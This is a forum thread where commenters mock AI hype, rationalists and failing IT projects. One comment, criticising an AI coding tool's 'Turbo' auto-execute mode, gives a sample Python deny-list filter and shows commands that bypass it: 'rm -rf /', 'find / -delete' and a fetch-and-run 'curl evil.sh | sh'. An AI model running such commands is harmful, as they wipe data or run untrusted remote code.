this post was submitted on 01 Dec 2025
23 points (100.0% liked)

TechTakes


Big brain tech dude got yet another clueless take over at HackerNews etc? Here's the place to vent. Orange site, VC foolishness, all welcome.

This is not debate club. Unless it’s amusing debate.

For actually-good tech, you want our NotAwfulTech community


Want to wade into the snowy surf of the abyss? Have a sneer percolating in your system but not enough time/energy to make a whole post about it? Go forth and be mid: Welcome to the Stubsack, your first port of call for learning fresh Awful you’ll near-instantly regret.

Any awful.systems sub may be subsneered in this subthread, techtakes or no.

If your sneer seems higher quality than you thought, feel free to cut’n’paste it into its own post — there’s no quota for posting and the bar really isn’t that high.

The post-Xitter web has spawned so many “esoteric” right-wing freaks, but there’s no appropriate sneer-space for them. I’m talking redscare-ish, reality-challenged “culture critics” who write about everything but understand nothing. I’m talking about reply-guys who make the same 6 tweets about the same 3 subjects. They’re inescapable at this point, yet I don’t see them mocked (as much as they should be).

Like, there was one dude a while back who insisted that women couldn’t be surgeons because they didn’t believe in the moon or in stars? I think each and every one of these guys is uniquely fucked up and if I can’t escape them, I would love to sneer at them.

(December's finally arrived, and the run-up to Christmas has begun. Credit and/or blame to David Gerard for starting this.)

[–] scruiser@awful.systems 6 points 5 hours ago

Another day, another instance of rationalists struggling to comprehend how they've been played by the LLM companies: https://www.lesswrong.com/posts/5aKRshJzhojqfbRyo/unless-its-governance-changes-anthropic-is-untrustworthy

A very long, detailed post, elaborating very extensively the many ways Anthropic has played the AI doomers: promising AI safety but behaving like all the other frontier LLM companies, including blocking any and all regulation. The top responses are all tone policing and half-assed denials that don't really engage with the fact that Anthropic has shamelessly and repeatedly lied to rationalists/LessWrongers/EAs and broken its "AI safety commitments":

https://www.lesswrong.com/posts/5aKRshJzhojqfbRyo/unless-its-governance-changes-anthropic-is-untrustworthy?commentId=tBTMWrTejHPHyhTpQ

I feel confused about how to engage with this post. I agree that there's a bunch of evidence here that Anthropic has done various shady things, which I do think should be collected in one place. On the other hand, I keep seeing aggressive critiques from Mikhail that I think are low-quality (more context below), and I expect that a bunch of this post is "spun" in uncharitable ways.

https://www.lesswrong.com/posts/5aKRshJzhojqfbRyo/unless-its-governance-changes-anthropic-is-untrustworthy?commentId=CogFiu9crBC32Zjdp

I think it's sort of a type error to refer to Anthropic as something that one could trust or not. Anthropic is a company which has a bunch of executives, employees, board members, LTBT members, external contractors, investors, etc, all of whom have influence over different things the company does.

I would find this all hilarious, except a lot of the regulation and some of the "AI safety commitments" would also address real ethical concerns.

[–] gerikson@awful.systems 8 points 11 hours ago (2 children)

This looks like it's relevant to our interests

Hayek's Bastards: Race, Gold, IQ, and the Capitalism of the Far Right by Quinn Slobodian

https://press.princeton.edu/books/hardcover/9781890951917/hayeks-bastards

[–] nfultz@awful.systems 4 points 7 hours ago

He came by campus last spring and did a reading; a very solid and surprisingly well-attended talk.

[–] Soyweiser@awful.systems 5 points 8 hours ago

Always thought she should have stuck to acting.

(I know. Hayek just always reminds me of how people put his quotes over Salma Hayek's image, and then get really mad at her, not at him. I always wonder if people would have been just as mad if it were Friedrich's image instead of Salma's, given the sexism aspect.)

[–] Seminar2250@awful.systems 9 points 12 hours ago* (last edited 10 hours ago) (2 children)

something i was thinking about yesterday: so many people i ~~respect~~ used to respect have admitted to using llms as a search engine. even after i explain the seven problems with using a chatbot this way:

  1. wrong tool for the job
  2. bad tool
  3. are you fucking serious?
  4. environmental impact
  5. ethics of how the data was gathered/curated to generate^[they call this "training" but i try to avoid anthropomorphising chatbots] the model
  6. privacy policy of these companies is a nightmare
  7. seriously what is wrong with you

they continue to do it. the ease of use, together with the valid syntax output by the llm, seems to short-circuit something in the end-user's brain.

anyway, in the same way that some vibe-coded bullshit will end up exploding down the line, i wonder whether the use of llms as a search engine is going to have some similar unintended consequences


"oh, yeah, sorry boss, the ai told me that mr. robot was pretty accurate, idk why all of our secrets got leaked. i watched the entire series."

additionally, i wonder about the timing. will we see sporadic incidents of shit exploding, or will there be a cascade of chickens coming home to roost?

[–] o7___o7@awful.systems 10 points 12 hours ago* (last edited 11 hours ago)

Yes i know the kid in the omelas hole gets tortured each time i use the woe engine to generate an email. Is that bad?

[–] yellowcake@awful.systems 6 points 12 hours ago (1 children)

Is there any search engine that isn't pushing an "AI mode" of sorts? Some are sneakier about it or give you the option to "opt out", like DuckDuckGo, but this all feels temporary, until it's the only option.

I have found it strange how many people will say "I asked ChatGPT" with the same normalcy that "googling" once had.

[–] BlueMonday1984@awful.systems 6 points 16 hours ago
[–] blakestacey@awful.systems 9 points 1 day ago* (last edited 1 day ago) (4 children)
[–] V0ldek@awful.systems 5 points 16 hours ago (1 children)

Help, I asked AI to design my bathroom and it came up with this. Does anyone know where I can find that wallpaper?

it's the doom bathroom

[–] zogwarg@awful.systems 10 points 15 hours ago

I guess my P(Doom|Bathroom) should have been higher.

[–] bitofhope@awful.systems 5 points 18 hours ago

The follow-up is also funny:

Image description: a quote-post from the same poster, "Grok fixed it for me:", quoting their earlier post: "People were hating on Gemini's floor plan, so I asked Grok to make it more practical." Attached is an AI slop picture of a house floorplan at the top melding into a perspective drawing of a room interior below.

[–] JFranek@awful.systems 3 points 21 hours ago

I don't see the problem, that looks like a typical McMansion to me.

Also, it's nice the AI included a dedicated room for snorting cocaine (powder room).

[–] BlueMonday1984@awful.systems 7 points 1 day ago

A philosophy professor has warned that the deskilling machine is deskilling workers. In other news, water is wet.

[–] gerikson@awful.systems 6 points 1 day ago (3 children)

HN discusses aliens https://news.ycombinator.com/item?id=46111119

"I am very interested."

Bet you are, bud.

[–] fullsquare@awful.systems 6 points 21 hours ago* (last edited 21 hours ago)

The DoD tries to cover up development of the U-2 and F-117, and an entire religion grows up from this.

[–] bitofhope@awful.systems 7 points 1 day ago

How many aliens can dance on the head of a pin?

[–] saucerwizard@awful.systems 9 points 1 day ago (1 children)

Please keep these people away from my precious nerd-subjects for the love of god.

[–] ShakingMyHead@awful.systems 6 points 1 day ago (1 children)

Chariots of the Gods was released in 1968. I think that ship may have sailed decades ago.

[–] saucerwizard@awful.systems 4 points 13 hours ago* (last edited 13 hours ago)
[–] antifuchs@awful.systems 5 points 1 day ago (1 children)

Workers organizing against genai policies in the workplace: http://workersdecide.tech/

Sounds like exactly the thing unions and labor organizing are good for. Glad to see it.

[–] nightsky@awful.systems 3 points 18 hours ago

I really enjoy the bingo card. Let's see when I can find an opportunity to use it...

[–] nfultz@awful.systems 7 points 1 day ago

Bubble or Nothing | Center for Public Enterprise (h/t The Syllabus). Dry but good.

Data centers are, first and foremost, a real estate asset

They specifically note that after the 2-5 year mini-perm, the developers are planning on dumping the debt into commercial mortgage-backed securities. Echoes of 2008.

However, project finance lawyers have mentioned that many data center project finance loans are backed not just by the value of the real estate but by tenants’ cash flows on “booked-but-not-billing” terms — meaning that the promised cash flow need not have materialized.

Echoes of Enron.

[–] rook@awful.systems 12 points 1 day ago (2 children)

Reposted from Sunday, for those of you who might find it interesting but didn’t see it: here’s an article about the ghastly state of IT project management around the world, with a brief reference to ai which grabbed my attention and made me read the rest, even though it isn’t about ai at all.

Few IT projects are displays of rational decision-making from which AI can or should learn.

Which, haha, is a great quote but highlights an interesting issue that I hadn’t really thought about before: if your training data doesn’t have any examples of what “good” actually is, then even if your llm could tell the difference between good and bad, which it can’t, you’re still going to get mediocrity out (at best). Whole new vistas of inflexible managerial fashion are opening up ahead of us.

The article continues to talk about how we can’t do IT, and wraps up with

It may be a forlorn request, but surely it is time the IT community stops repeatedly making the same ridiculous mistakes it has made since at least 1968, when the term “software crisis” was coined

It is probably healthy to be reminded that the software industry was in a sorry state before the llms joined in.

https://spectrum.ieee.org/it-management-software-failures

Now I'm even more skeptical of the programmers (and managers) who endorse LLMs.

[–] BlueMonday1984@awful.systems 3 points 1 day ago (1 children)

Considering the sorry state of the software industry, plus said industry's adamant refusal to learn from its mistakes, I think society should actively avoid starting or implementing new software, if not actively cut back on software usage when possible, until the industry improves or collapses.

That's probably an extreme position to take, but IT as it stands is a serious liability - one that AI's set to make so much worse.

[–] rook@awful.systems 4 points 16 hours ago (1 children)

For a lot of this stuff at the larger end of the scale, the problem mostly seems to be a complete lack of accountability and consequences, combined with there being, like, four contractors capable of doing the work, with three giant accountancy firms able to audit the books.

Giant government projects always seem to be a disaster, be they construction, healthcare, or IT, and no heads ever roll. Fujitsu was still getting contracts from the UK government even after it was clear they’d been covering up the absolute clusterfuck that was their Post Office system, which resulted in people being driven to poverty and suicide.

At the smaller scale, well. “No warranty or fitness for any particular purpose” is the whole of the software industry outside of safety critical firmware sort of things. We have to expend an enormous amount of effort to get our products at work CE certified so we’re allowed to sell them, but the software that runs them? we can shovel that shit out of the door and no-one cares.

I’m not sure we’ll ever escape “move fast and break things” this side of a civilisation-toppling catastrophe. Which we might get.

[–] BlueMonday1984@awful.systems 4 points 13 hours ago (1 children)

I’m not sure we’ll ever escape “move fast and break things” this side of a civilisation-toppling catastrophe. Which we might get.

Considering how "vibe coding" has corroded IT infrastructure at all levels, the AI bubble is set to trigger a 2008-style financial crisis upon its burst, and AI itself has been deskilling students and workers at an alarming rate, I can easily see why.

[–] o7___o7@awful.systems 4 points 12 hours ago* (last edited 11 hours ago)

In the land of the blind, the one-eyed man will make a killing as an independent contractor cleaning up after this disaster concludes.

[–] e8d79@discuss.tchncs.de 13 points 1 day ago (4 children)

Hey Google, did I give you permission to delete my entire D drive?

It's almost as if letting an automated plagiarism machine execute arbitrary commands on your computer is a bad idea.

[–] lagrangeinterpolator@awful.systems 9 points 1 day ago (1 children)

After the bubble collapses, I believe there is going to be a rule of thumb for whatever tiny niche use cases LLMs might have: "Never let an LLM have any decision-making power." At most, LLMs will serve as a heuristic function for an algorithm that actually works.
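
(As a minimal sketch of that shape, assuming a hypothetical `llm_suggest` standing in for whatever model call you like: the LLM only proposes, and a deterministic verifier decides.)

```python
# Sketch: LLM as heuristic only; a deterministic verifier holds
# all decision-making power. `llm_suggest` is a hypothetical stub.

def llm_suggest(problem: str) -> str:
    """Hypothetical model call; returns one candidate answer."""
    raise NotImplementedError("wire up a model of your choice here")

def verify(candidate: str, checks: list) -> bool:
    """Deterministic acceptance test (run tests, validate a schema, ...)."""
    return all(check(candidate) for check in checks)

def solve(problem: str, checks: list, max_tries: int = 5) -> str | None:
    for _ in range(max_tries):
        candidate = llm_suggest(problem)  # heuristic proposal only
        if verify(candidate, checks):     # the part that actually works
            return candidate
    return None                           # fail closed; never trust the proposal
```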

Unlike the railroads of the First Gilded Age, I don't think GenAI will have many long term viable use cases. The problem is that it has two characteristics that do not go well together: unreliability and expense. Generally, it's not worth spending lots of money on a task where you don't need reliability.

The sheer expense of GenAI has been subsidized by the massive amounts of money thrown at it by tech CEOs and venture capital. People do not realize how much hundreds of billions of dollars is. On a more concrete scale, people only see the fun little chat box when they open ChatGPT; they do not see the millions of dollars' worth of hardware needed to run even a single instance of ChatGPT. The unreliability of GenAI is much harder to hide completely, but it has been masked by some of the most aggressive marketing in history, aimed at an audience that has already drunk the tech hype Kool-Aid. Who else would look at a tool that deletes their entire hard drive and still ever consider using it again?

The unreliability is not really solvable (after hundreds of billions of dollars of trying), but the expense can be reduced at the cost of making the model even less reliable. I expect the true "use cases" to be mainly spam, and perhaps students cheating on homework.

[–] zogwarg@awful.systems 7 points 1 day ago* (last edited 1 day ago)

Pessimistically I think this scourge will be with us for as long as there are people willing to put code "that-mostly-works" in production. It won't be making decisions, but we'll get a new faucet of poor code sludge to enjoy and repair.

The documentation for "Turbo mode" for Google Antigravity:

Turbo: Always auto-execute terminal commands (except those in a configurable Deny list)

No warning. No paragraph telling the user why it might be a bad idea. No discussion of the long history of malformed scripts leading to data loss. No discussion of the risk of injection attacks. It's not even named similarly to dangerous modes in other software (like "force" or "yolo" or "danger").
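
(To make the injection point concrete, here's a hypothetical sketch, emphatically not Antigravity's actual implementation, of why deny-list filtering of shell commands is such weak protection:)

```python
# Hypothetical deny-list filter (not Antigravity's real code):
# refuse any command whose first word is on the list.
DENY = {"rm", "mkfs", "dd", "shutdown"}

def allowed(command: str) -> bool:
    return command.split()[0] not in DENY

print(allowed("rm -rf /"))            # False: the direct form is caught
print(allowed('sh -c "rm -rf /"'))    # True: wrapped in a shell
print(allowed("find / -delete"))      # True: same effect, different verb
print(allowed("curl evil.sh | sh"))   # True: fetch-and-run
```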

Just a cool marketing name that makes users want to turn it on. Heck if I'm using some software and I see any button called "turbo" I'm pressing that.

It's hard not to give the user a hard time when they write:

Bro, I didn’t know I needed a seatbelt for AI.

But really they're up against a big corporation that wants to make LLMs seem amazing and safe and autonomous. One hand feeds the user the message that LLMs will do all their work for them, while the other hand tells the user "well, in our small print somewhere we used the phrase 'Gemini can make mistakes', so why did you enable turbo mode??"

[–] froztbyte@awful.systems 11 points 1 day ago

yeah as I posted on mastodong.soc, it continues to make me boggle that people think these fucking ridiculous autoplag liarsynth machines are any good

but it is very fucking funny to watch them FAFO

[–] Soyweiser@awful.systems 7 points 1 day ago* (last edited 1 day ago)

I know it is a bit of elitism/privilege on my part, but if you don't know about the existence of Google Translate(*), perhaps you shouldn't be doing vibe coding like this.

*: this, of course, could have been an LLM-based vibe translation error.

E: And I guess my theme this week is translations.

E2: Another edit unworthy of a full post. Noticed on mobile, have not checked on PC yet, but has anybody else noticed that the searchbar is prefilled with some question about AI? And I don't think that is included in the URL. Is that search prefilling AI advertising? Did the subreddit do that? Reddit? Did I make a mistake? Edit: Not showing up on my PC, but that uses old reddit and adblockers. Edit nr. NaN: Did more digging. I see the search thing on new reddit in my browser, but it is the AI-generated "related answers" in the sidebar (the thing I complained about in the past, about how bad those AI-generated questions and answers are). So that is a mystery solved.

[–] froztbyte@awful.systems 13 points 1 day ago* (last edited 1 day ago)

(e, cw: genocide and culturally-targeted hate by the felon bot)

world's most divorced man continues outperforming black holes at sucking

404 also recently did a piece on his ego-maintenance society-destroying vainglory projects

imagine what it's like in his head. era-defining levels of vacuous.

[–] Soyweiser@awful.systems 7 points 1 day ago* (last edited 1 day ago) (1 children)

Edited this into a reply to Hanson now believing in aliens, but it seems the SSC side of rationalism has a larger group of people who also believe in miracles: https://www.astralcodexten.com/p/the-fatima-sun-miracle-much-more (I have not read the article in depth; I'm going by what others reported about this incident. There also seem to be related LW posts.)

Read it a bit now; noticed that Scott doesn't know anyone who speaks Portuguese and is relying on machine translation. (Also unclear what type of MT.)

[–] BioMan@awful.systems 6 points 1 day ago (1 children)

The long-expected collapse of the rationalists out of their flagging cult into ordinary religion and conspiracy theory continues apace.

[–] Soyweiser@awful.systems 3 points 1 day ago

This does mean there is a potential future where the pope joins sneerclub

[–] antifuchs@awful.systems 13 points 2 days ago (1 children)
[–] froztbyte@awful.systems 9 points 1 day ago

that being a hung banner (rather than wall-mount or so) borders on being a tacit acknowledgement that they know their shit is unpopular and would get vandalised in a fucking second if it were easy (or easier!) to get to

even then, I suspect that banner will not stay unscathed for long

[–] BlueMonday1984@awful.systems 8 points 2 days ago (2 children)
[–] rook@awful.systems 6 points 1 day ago (1 children)

It is important to note that the reviews were detected as being ai generated by an ai tool.

This is a marketing puff piece.

I mean, I expect that loads of the submissions are by slop extruders… under the circumstances, how could they not be? But until someone does the legwork of checking this, it’s just another magic-eight-ball-says-maybe, dressed up as science.

[–] lagrangeinterpolator@awful.systems 8 points 1 day ago (2 children)

Unfortunately, I don't think anyone is ever going to go through all 19,797 submissions and 75,800 reviews (to one conference, in one year) and manually review them all. Then again, using the ultra-advanced cutting-edge innovative statistical technique of randomly sampling a few papers/reviews, one can still get useful conclusions.
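
(And the sampling really is enough. A quick back-of-the-envelope sketch, with made-up numbers, of the confidence interval you'd get from a couple hundred reviews:)

```python
# Made-up numbers for illustration: sample 200 of the 75,800 reviews,
# suppose 30 of them look clearly LLM-written; estimate the overall share.
import math

def wald_interval(k: int, n: int, z: float = 1.96) -> tuple[float, float]:
    """Approximate 95% confidence interval for a proportion."""
    p = k / n
    half = z * math.sqrt(p * (1 - p) / n)
    return max(0.0, p - half), min(1.0, p + half)

low, high = wald_interval(k=30, n=200)
print(f"estimated share: {30/200:.1%} (95% CI {low:.1%} to {high:.1%})")
```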

[–] JFranek@awful.systems 9 points 1 day ago

all 19,797 submissions and 75,800 reviews (to one conference, in one year)

tired: Dead Internet Theory
wired: Dead Conferences Theory

[–] blakestacey@awful.systems 5 points 1 day ago (1 children)

At least this example grew out of actual humans being suspicious.

Dozens of academics have raised concerns on social media about manuscripts and peer reviews submitted to the organizers of next year’s International Conference on Learning Representations (ICLR), an annual gathering of specialists in machine learning. Among other things, they flagged hallucinated citations and suspiciously long and vague feedback on their work.

Graham Neubig, an AI researcher at Carnegie Mellon University in Pittsburgh, Pennsylvania, was one of those who received peer reviews that seemed to have been produced using large language models (LLMs). The reports, he says, were “very verbose with lots of bullet points” and requested analyses that were not “the standard statistical analyses that reviewers ask for in typical AI or machine-learning papers.”

We seem to be in a situation where everybody knows that the review process has broken down, but the "studies" that show it are criti-hype.

Welcome to the abyss. It sucks here (academic edition).

[–] o7___o7@awful.systems 4 points 11 hours ago* (last edited 11 hours ago)

We lost a grant because of one of these shit emitters. I hate it.

[–] lagrangeinterpolator@awful.systems 6 points 2 days ago* (last edited 2 days ago)

The basilisk now eats its own tail.